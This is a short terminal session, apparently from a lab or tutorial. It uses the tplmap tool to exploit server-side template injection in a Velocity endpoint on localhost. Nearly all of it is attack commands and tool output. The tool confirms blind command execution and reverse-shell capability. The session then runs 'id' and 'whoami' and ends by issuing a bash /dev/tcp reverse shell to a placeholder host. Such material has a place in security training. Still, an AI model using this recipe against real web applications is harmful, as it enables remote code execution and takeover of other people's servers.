git clone https://github.com/epinna/tplmap
python tplmap.py --os-shell -u 'https://localhost:8080/ssti/velocity?template=aa'

[+] Testing if GET parameter 'template' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin is testing blind injection
[+] Twig plugin is testing rendering with tag '{{*}}'
[+] Twig plugin is testing blind injection
[+] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin is testing blind injection
[+] Velocity plugin is testing rendering with tag '*'
[+] Velocity plugin is testing blind injection
[+] Velocity plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
  GET parameter: template
  Engine: Velocity
  Injection: *
  Context: text
  OS: undetected
  Technique: blind
  Capabilities:
   Shell command execution: ok (blind)
   Bind and reverse shell: ok
   File write: ok (blind)
   File read: no
   Code evaluation: no
[+] Blind injection has been found and command execution will not produce any output.
[+] Delay is introduced appending '&& sleep <delay>' to the shell commands. True or False is returned whether it returns successfully or not.
[+] Run commands on the operating system.
 (blind) $ id
True
 (blind) $ whoami
True
 (blind) $ bash -i >& /dev/tcp/reverse_ip/2333 0>&1